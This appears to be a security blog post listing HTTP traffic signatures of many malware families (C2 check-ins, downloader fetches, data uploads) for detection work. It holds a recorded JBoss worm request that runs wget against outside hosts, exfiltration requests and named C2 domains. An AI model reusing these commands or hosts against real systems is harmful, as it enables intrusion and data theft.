Current malware traffic example listing (see http://www.deependresearch.org/2013/04/library-of-malware-traffic-patterns.html for details and sample, pcap downloads).
| 9002 ... | 9002.............. |
| 9002POST | POST /2d HTTP/1. 1 |
| Andromeda | POST /new/gate.php HTTP/1.1 |
| APT1_WEBC2_RAVE | GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0 |
| Asprox Checkin | GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35C70A97FF61249661F38426DA71D12B40F9A512B6C945CD85462CD565962B6C5CACB1B09F86B1651EB971F3013D14695028FE0BEBD838B9D3C5DE002EA95371E51B0E8CFB7567F6BF HTTP/1 . 1 |
| AsproxGET list of C2s | GET /4213D5182A41F58F3D01D8208B0BE9633A985A4C35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0 HTTP/1.1 |
| AsproxGETs spam template | GET /78dc91f1D56B9COC18B818A7A2B272F43O3A621CAEOC17O479E4E9A69B82 HTTP/1 .1 |
| Avatar Rootkit | GET /search?query=EZTFDHWP&sort=relevance HTTP/1 .1 http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance |
| backdoor ? | GET /18110123/page_32262 308. html HTTP/1. 1 |
| Banechant 1 | GET /IGKKT HTTP/1.1 |
| Banechant payload dl 2 | GET /adserv/logo.jpg HTTP /1.1 |
| Beebone downloader | GET
/0/?f|-1813912965Admin GET a/76876332/1 |
| Beebus | GET /windosdate/v6/defau1t.aspx?ln=en-us HTTP/1 .1 |
| Beebus C2 checkin | GET /s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1 |
| Beebus C2 checkin | GET /s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8dZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1 HTTP/1.1 |
| Beebus data send | POST /s/asp?__uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVwBJAE4ARABPAFcAUwBNAEEAQQBOAEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==p=2 HTTP/1.1 |
| Bitcoinminer | POST / HTTP/1.1 Authorization: Basic cXdlcnR5MTIzLjE6eA== |
| Carberp | POST /kmqkcicalxrntrngwdxjyxztxcqkoyjnbdoafqirgnwwvpcjqglucovna.phtm |
| Citadel | POST /g.php HTTP/1.1 |
| Citadel (Zbot var) | POST /C270suqdh/file.php HTTP/1.1 |
| Cookies / Cookiebag | GET /1799.asp HTTP/1.1 |
| Cookies /Cookiebag / Dalbot | GET /3961.html HTTP/1.1 Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtleT0zOTU0O2hvc3RuYW1lPXZpY3RpbTs= |
| Cookies /Cookiebag / Dalbot | GET /indexs.zip HTTP/1.1 |
| Cookies /Cookiebag / Dalbot | GET /8223.asp HTTP/1.1 |
| Coswid | GET /old/google.png HTTP/1.1 |
| CVE-2012-0754 SWF in DOC | GET /test.mp4 HTTP/1.1 |
| CVE-2012-0779 | GET /essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000 HTTP/1.1 |
| Darkmegi | GET /20111230.jpg HTTP/1.1 |
| Darkness DDos v8g | GET /index.php?uid=587609&ver=8g%20XP HTTP/1.0 |
| Depyot | GET /new/3d/d/pdf .php?id=2 HTTP/1. 1 |
| Destory Rat / Sogu / Thoper | POST /update?id= 000f72b8 HTTP/1. 1 |
| Destory Rat / Sogu / Thoper | POST /update?id=3109c2a2 HTTP/1.1 |
| Destory Rat / Sogu / Thoper | POST /update?product=windows HTTP/1.1 |
| Destory Rat / Sogu / Thoper (reported as PlugX RAT ver) | POST /update?id=000f6b50 HTTP/1.1 |
| DirtJumper DDoS | POST /678/index.php |
| Dirtjumper ddos | POST /boi854tr4w.php HTTP/1.0 |
| Disttrack | GET /ajax_modal/modal/data.asp?mydata=AA==&uid=aaa.bbb.ccc.ddd&state=3067203 HTTP/1.0 |
| DNSChanger | POST /d56sc1d56scd56sc1.php?ini=v22Mmjy0SYXyWTI0tQ0QQOdqOb68J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV750QegiBMF4XAHPzbYqRtufQpaX/M/trvO7ukg== HTTP/1.1 |
| DNSwatch / Protux | GET /dns/dnslookup?la=en&host=picture.ucparlnet.com&type=A&submit=Resolve HTTP/1.1 |
| Downloader BMP | GET /images/evil.bmp HTTP/1.1 |
| Einstein | GET / gttfi.php?id=019451425260376469&ext=YmFkc3R1ZmYuZGxs HTTP/1.1 |
| Einstein data send | POST / gttfi.php?id=019451425260376469&ext=ixioJXXJFCRrrDatKHhK HTTP/1.1 |
| EK - Blackhole 2 landing | GET /news/default-php-version.php?mdm=30:1g:2v:1f:1o&xguc=3b:3i:39:35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd HTTP/1.1 |
| EK Blackhole 1 | GET /showthread.php?t=d7ad916d1c0396ff HTTP/1.1 |
| EK Phoenix | GET /navigator/jueoaritjuir.php HTTP/1.1 |
| Enfal / Lurid | GET /oi2c/wlc3/ [reducted]:00-00-00-00-00-00/ij83d HTTP/1.1 |
| Enfal / Lurid | GET /trandocs/nm/.[reducted] :00-00-00-00-00-00lCrrrwhite HTTP/1.1 |
| Enfal / Lurid | POST /cgi-bin/CMS_SubitAll.cgi HTTP/1 .1 |
| Enfal / Lurid | POST /cgl-bin/Owpq4.cgi HTTP/1.1 |
| Enfal / Lurid | POST /Sjwpc/odw3ux HTTP/1.1 |
| FakeAV var (via Kuluoz - Asprox botnet) | GET /AFC392A9570E45C188F468429F6349E82ABF530D32184946F872BB899FAECD808398A1630AEB78FE6EE44AB334A67A0A45B4ED8A690330E832085902F014621616CEB4AF702F4E5B37A9F53B21242F HTTP/1.1 |
| Favorites / Orsam / Apptom | GET /download731106?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1 |
| Favorites / Orsam / Apptom | GET /search?qu= HTTP/1.1 |
| Favorites / Orsam / Apptom | GET /search59861?h1=51&h2=1&h3=BHI06233&h4=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1 |
| Favorites / Orsam / Apptom | GET /search613522?h1=FIFEFDAHAPGDENCMFOFFFCAGAE HTTP/1.1 |
| Favorites / Orsam / Apptom | POST /search25548?h1=FIFEFDAHAPGDENCMFNFFFNAGAH HTTP/1.1 |
| Favorites / Orsam / Apptom | POST /upload8806?h1=FIFEFDAHAPGDENCMFOFMFGAEAE HTTP/1.1 |
| Flashback OSX | GET /statistics.html HTTP/1.1 |
| Foxy | POST /404error.asp HTTP/1.1 |
| Foxy Checkin | GET /images/leftnav_prog_bg.jpg HTTP/1.1 |
| Gapz C&C request | POST / HTTP/1.0 Host: hvqnut3kurg3lku.strangled.net |
| Gh0st | GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1 |
| Gh0st | Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1 |
| Gh0st ASP ver | GET /1/v2/1oginv2.asp?hi2wsdf351&x.’..[xf)..<.3XqHr....)IL{..&y192.168.O.69 HTTP/1.1 |
| Gh0st PHP ver | GET /ld/queenfun/vl /login.php?cd2hpdGU&uU11TVEV&s&pMTkyLjE2OC4wljYS&hi2wsdf35l |
| Gh0st v2000 var | v2010........f...............( ......Service Pack 2..?..|...|...|0.@.. |
| Gh0st var | GET /h. gif ?pid =1 13&v=130586214568 HTTP/ 1. 1 |
| Glasses | GET /ewpindex.htm HTTP/1.1 |
| GoogleAdC2 | GET /html/lost.html HTTP/1.1 |
| GoogleAdC2 2nd stage | GET /Trojan2.jpg HTTP/1.1 |
| Googles | GET /sll/monica.jpg HTTP/1.1 |
| Greencat | GET / |
| Gtalk | GET /facebook.png HTTP/1.1 |
| Guntior - CN bootkit | GET /yx/tongji.html HTTP/1.1 |
| Gypthoy | POST /opt/mainpage.php HTTP/1.1 |
| Hiloti | GET
/get2.php?c=DMRACJEP&d=26606B67393C36322E64636F317E3E3D2120222124243078747D456E7579232910121A14141047015D404E166D1D1B1676740101060203760C787F0C05787D0801007573067C7F770A7E7B0F6A2F27212634206E656D657130303E666A6A6F6A55565A024204020A55584C041F1B0B1D4D442D42522A02141344574A4B4C4E4AB4B5B7B1BDA3F6F5E7EAB7CEF4FDE2E0E2F4E0BDD1CDD3B1F4FDABC4F9A0AFB9C3CDCCD7FBC09B978EDE9C9F919D88C98D8094C1898490D4D6DDD6869AD4DADEB4A4FFF2F6FCF0F1FCF8FCFBFCEB8B8082
HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) |
| HOIC DDoS | GET / HTTP/1.0 |
| Horst Proxy | GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1 |
| icon.js - system info send | GET /1js/handle.
php?addr=http%3A//thaingo.org/web/category/daylinews/enqnews/&ck
=PHPSESSI D%3 Dn3fj1rfatdpgvpp7lucn0g44 c5%3B%20_utma% 3D202272852. 2144388183.1340808890.1340808890.1340877171.2%3B%20_utmb% 3D202272852. 2.10.1340877171%3B%20_utmc%3D202272852%3B%20_utmz% 3D202272852.1340808890.1.1. utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D% 28none%29&soft=Windows%20Explorer&browser=Mozilla/4. 0%20(compatible;%20MSIE%208. 0;%20windows%20NT%205.1;%20Trident/4.0;%20.NET%2OCLR%202.0.50727;%20.NET%2OCLR% 203.0.04506.648;%20.NET%20CLR%203.5.21022;%20.NET%2OCLR%203.O.4506.2152;%20.NET%20CLR% 203.5. 30729;%20. NET4. 0c;%20. NET4. 0E)&flashver=WIN%206%2c0%2c88%2c0 HTTP/1.1 |
| IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT | POST /index000000001.asp HTTP/1.1 |
| Imaut | GET /setting.doc HTTP/1.1 |
| IRCbot | GET /check_ver.php?version=1.09 HTTP/1.1 |
| IXESHE | GET
/AWS26329.jsp?UrFvwIJIOKTRyfxR9KNRqhg8lcPr/CGjUwP8yJUs7RjH7OinJ/85cgrqiP8jKGjpqgb/ wTrO7OIjhxoHcGaFaURqK/aHophHLd23K=NHk=a9oQhvDQaLky8qo/RnJz42A HTTP/1 .1 |
| IXESHE | GET
/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9jOKyjnxKjQJA HTTP/1.1 x_bigfix_client_string: baQMyZrdqDAA |
| IXESHE AES | GET /AES210001
129016878.jsp?UrFwUIO3h7ofgwQInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk= +LLQhpkZ9LOhGbgqvJghHci7M HTTP/1 .1 |
| JBOSS worm | GET
/zecmd/zecmd.jsp?comment=perl+lindb.pl HTTP/1.0 GET /idssvc/idssvc.jsp?comment=wget+http://webstats.dyndns.info/javadd.tar.gz HTTP/1.0 GET /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz HTTP/1.0 |
| Karagany Loader | GET /user/go.php?html=do HTTP/1.1 |
| KoreanBanker DL | GET /web/down/kbs.exe HTTP/1.1 |
| Kuluoz.B downloader | |
| Letsgo / TabMsgSQL | GET
/indexbak.asp?rands=IXLCGIXELZ&acc=&str=select%20id%20from%20tab_online%20where%20regc ode%20=%20'IXLCGIXELZ' HTTP/1.1 |
| Letsgo / TabMsgSQL | GET /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str=select%20top%201%20%20 from%20tab_message%20where%20toid%20=%20'198'%20order%20by%20id%20asc HTTP/1.1 |
| Letsgo / TabMsgSQL | GET
/safe/1.asp?rands=XJOTLVALQF&acc=vy&str=insert%20into%20tab_online%20
(mode,clientname,clientip,accessip,onlinetime,lasttime,regcode)%20values%20
('0','victim','192.168.1.12','145.42.112.19','2011-06-08%2013:45:54', '2011-06-08%2013:45:54','NMQVPTXFBH') HTTP/1.1 |
| Letsgo / TabMsgSQL downloader | GET /new/iistart.html HTTP/1.1 |
| Likseput | GET /index.html HTTP/1.1 |
| Lingbo(?) | POST
/windowsupdatev7/search%3Fhl%3cWABQAFMAUAAzACOAUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4AM >QAxADYA%26meta%3DMDAwMGhIÆÑuMDk%3D%26id%3Dlfdxfircvscxggb HTTP/1 .1 |
| Luckycat - WIMMIE | POST /count/count.php?m=c&n=[HOSTNAME]_ |
| LURK | LURK0........x.kf.e.apgpbpa0c..#........ |
| Medfos | GET /js/disable.js?type=live&ua=MSIE&u=BgCRABQAMFX_DQEGCJgQAAAAAAAAJA0CFAsAAAD0krxq4hGde6y4c4Imb5lvKDQlUc-Vd0TCuBSswSxzsiKLdPIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPgAAAB4AAAA0VgAA HTTP/1.1 |
| Mefos | GET /uploading/id=1888546865&u=4WWbvjA+sJYdYzrNmxr7vmGjfIZ4mztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM4RqxalcusDRHEOWDjvdOj3ww== HTTP/1.1 |
| MiniASP | GET /device_ |
| MiniASP | GET /record.asp?device_t= |
| Miniduke | POST /index.php HTTP/1.1 |
| Miniflame | POST /cgi-bin/feed.cgi HTTP/1.1 |
| Mirage | POST http:(C&C):443/resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow HTTP/1. 1 |
| Mirage - later var | GET http://(removed ip)/search ?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg |
| Money loader | GET /get_xml?file_id=25227372
HTTP/1.1 GET /dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536 HTTP/1.1 |
| Mongal | GET /3010850A0000F0FD0F00323137443744324536313634333833380044454C4C58540000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000007014C61757261000000000000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1 |
| MSWab /Yayih | POST /bbs/info.asp HTTP/1.1 |
| Murcy | GET /150828 HTTP/1.0 |
| Netravler | GET /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT HTTP/1.1 |
| Netravler | GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQaCuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIXDEbC4ZDUZ3IzGEsWTZa73Z61ZqzmhNNJjORvOZvMx0EBXNJuMhvO5zEBYKAgKFTMxlOZzNJvNxhNgskplOR2qJlshhMZrEAzEAoIR1NJsMggGQ2GAwFIKkRaMVisxftVeOSTmu3O5FnKodDMckchCxlKNpuDxnRkN6qFFbDYcx4MxKKaPIZQKtMkcym6hDcZSSbjoZTYIDwOBsICMYTbQp5EFvk03mTNoajicrZOBwtQziAc5EDkZk0kFqZLOd7AdrEbS0c2pnwg4xGExSbKtfsmD3EXhvkfkDMAbjAXDYbax6eFtevhZsxgtBYu3AWIBAIBgIC2Uzyc56G3TJHiNXNJGk8uKnlhGY4niczbV4XGU8GXLdIquZjOZy8buM50HefBsN5njb1iRvmROfJ07xA3GlgjYczD4YccjCsx2NsfDoaDYcO9/Dq0x2MZoiodO-kOKn-ndGIxGVyPZ7xv7O3P6Mvd7RqORkIKLThMucpqOosG2wgcDeb5ujt1H89lEZyOsLhsNgzg46lLHanKOmyYZO5kxpJzTMbfBmtg8gwpHk2TV9Dn1RFEXtEeH7P-ZTWcu6HGeTYajj23wzGlVRtMht6tAajabg7mSoQz9R9MfXL7zcNBrRqVCgQTrX4Q6hjcU6re6zyIobzPzjUHuPZC-Y42DMeesoG2WV44aZagus6pisxMdbfWBDfFyNhhj5OGD5zsAzGusD3rwzGeUgdDlbYc7a7Se4-wNrMo4zhU5NPzy2p4AAbdj2LRJhjzSzMaTOdbjTpg2Z2mefix56t6pIysBATo4oeRdfNvzd/N4fZgKQ7TZgGvF6cVk0xy5StACcfFnOpmninigV7vx8oDk7B1zRDycPrfKVTcazdO7153cOcd-UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt HTTP/1.1 |
| Netravler | GET /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT&hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQaCicYTaZR6RDKbDYWCpKKBhM88YjIajKXLfKOEmQ0nIxm86m46D0YVg::end HTTP/1.1 |
| Neutrino EK var | POST /cxiqocvbqd HTTP/1.1 |
| NfLog | POST /IElog/TestURL.asp HTTP/1.0 |
| NfLog | POST /NfLog/Nfile.asp HTTP/1.1 |
| NTESSESS | GET /6K8gL8.html HTTP/1.1 |
| PassAlert | GET /loader/bin/file1.exe HTTP/1.1 |
| Pitty Tiger | GET /FC001/Remote%20PC-769f HTTP/1.1 |
| PNG trojan | GET /index.htm HTTP/1.1 |
| Poison Ivy | 256 bytes of seemingly random
data after a successful TCP handshake, then 48 byte “keep-alive” requests |
| Pony loader | POST /ponyb/gate.php HTTP/1.0 |
| PowerLoader | POST /postnuke/blog.php HTTP/1.1 |
| Protux | GET /news.jpg HTTP/1.1 |
| Protux | POST http://ssi.ucparlnet.com:80/PHqgHumeay5705.mp3 HTTP/1.1 |
| Quarian | CONNECT sureshreddy1.dns05.com:443 HTTP/1.0 |
| Ranbyus / Triton (Spy, Banking, smart cards) | POST /releases/index.php HTTP/1.1 |
| RedOctober AuthInfo | POST http://%s:%s%s HTTP/1.0 |
| RedOctober Sysinfo | POST http://%CnC%/cgi-bin/nt/sk HTTP/1.1 |
| Reedum | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] |
| RegSubDat | POST /5501000000/log HTTP/1.1 |
| RssFeeder (moved from TBD tab, common name still unknown) 2nd stage | POST /orange/news.php HTTP/1.1 |
| RssFeeder (moved from TBD tab, common name still unknown) initialGET | GET /data/rss HTTP/1.1 |
| Sanny / Win32.Daws | POST /write.php HTTP/1.1 |
| Seasalt | GET /postinfo.html HTTP/1.1 |
| Sofacy | POST /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 HTTP/1.1 |
| Srizbi | GET /cb_4.exe HTTP/1.1 |
| Stabuniq | POST /rssnews.php HTTP/1.1 |
| Swami | POST /im/linux.php HTTP/1.1 |
| Sykipot | GET /kys_allowget.asp?namegetkys.kys HTTP/1 .1 |
| Taidoor | GET /apzsr.php?id=021793111D309GE67E HTTP/1.1 |
| Tarsip Eclipse | GET /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 HTTP/1.1 |
| Tarsip Moon | GET /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif=qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230 HTTP/1.1 |
| Tbot tor | |
| Tinba aka Zusy | POST /h/index.php HTTP/1.1 |
| Trojan_GameThief | GET /xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4D468A2&os=winxp%20Professional&avs=unknow&ps=NO.&ver=0005&pnum=16 HTTP/1.1 |
| Urausy (Ransomware) | GET /ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php HTTP/1.1 |
| Variant Letsgo / TabMsgSQL downloader (comment crew) | GET /index.htm HTTP/1.1 |
| Vinself | POST /w880/T19R17Q16/12010L11014/ HTTP/1. 1 |
| Vobfus | GET /XEuPCLrf?e HTTP/1.1 |
| WEBC2-Bolid | GET /firefox.html HTTP/1.1 |
| WEBC2-Clover | GET /Default.asp HTTP/1.1 |
| WEBC2-CSON | GET /Default.aspx?INDEX=<10_random_characters> HTTP/1.1 |
| WEBC2-CSON Response to commands | POST /Default.aspx?ID=IMNQRSSRXK HTTP/1.1 |
| WEBC2-HEAD | GET / HTTP/1.1 |
| WEBC2-Table | GET /order.htm HTTP/1.1 |
| Xpaj | POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM&ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh HTTP/1.1 |
| Xtreme Rat | GET /1234567890.functions HTTP/1.1 |
| Xtreme Rat | GET/1234567890.functions HTTP/1.1 |
| ZeroAccess | GET /stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25 HTTP/1.1 |
| ZeroAccess - Counter site checkin | GET /5699145-24B8EBEDAA47374020E664A2406FB684/counter.img?theme=2&digits=10&siteId=31235706 HTTP/1.1 |
| Zeus Gameover | GET /search.php?page=73a07bcb51f4be71 HTTP/1.1 |
| Zeus | POST /orders2010.php HTTP/1.1
POST /busted.php HTTP/1.1 |
| Cutwail / Pushdo | POST /?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe HTTP/1.1 ( or xclzve) |
| USteal.D | 220---------- Welcome to Pure-FTPd ---------- |
| Hangover Smackdown Minapro | GET /flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts=[PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2 HTTP/1.1 |
| Adware Hotbar | POST /vic.aspx?ver=4.0.1158.0&rnd=595937 HTTP/1.1 |
| ArcomRat / Dokstormac | S_0001[!^]NEW[!^]127.0.0.1[!^]COMPUTERNAME[!^]username[!^]XP[!^]V1.3[!^]IDLE TIME[!^]Active Caption[!^]SPiBlnbspkvj6DQ5dnFrtvvJvNT4a8Y[!^]NO[!^]NO[!^]NO[!^][!^] |
| Mutopy Downloader | GET /protocol.php?p=3894120584&d=4fQm27CpL9m6oC7QvLZomrXyeYvptmyetaVE2deiLdi4 HTTP/1.1 |
| Symmi Remote File Injector | GET
/img/seek.cgi?lin=100&db=dfs HTTP/1.1 GET /ae1.php HTTP/1.1 GET /ggu.php HTTP/1.1 POST /wp-content/gallery/28-juli-sundsore/options.php HTTP/1.1 [wordpress url - varies] |
No comments:
Post a Comment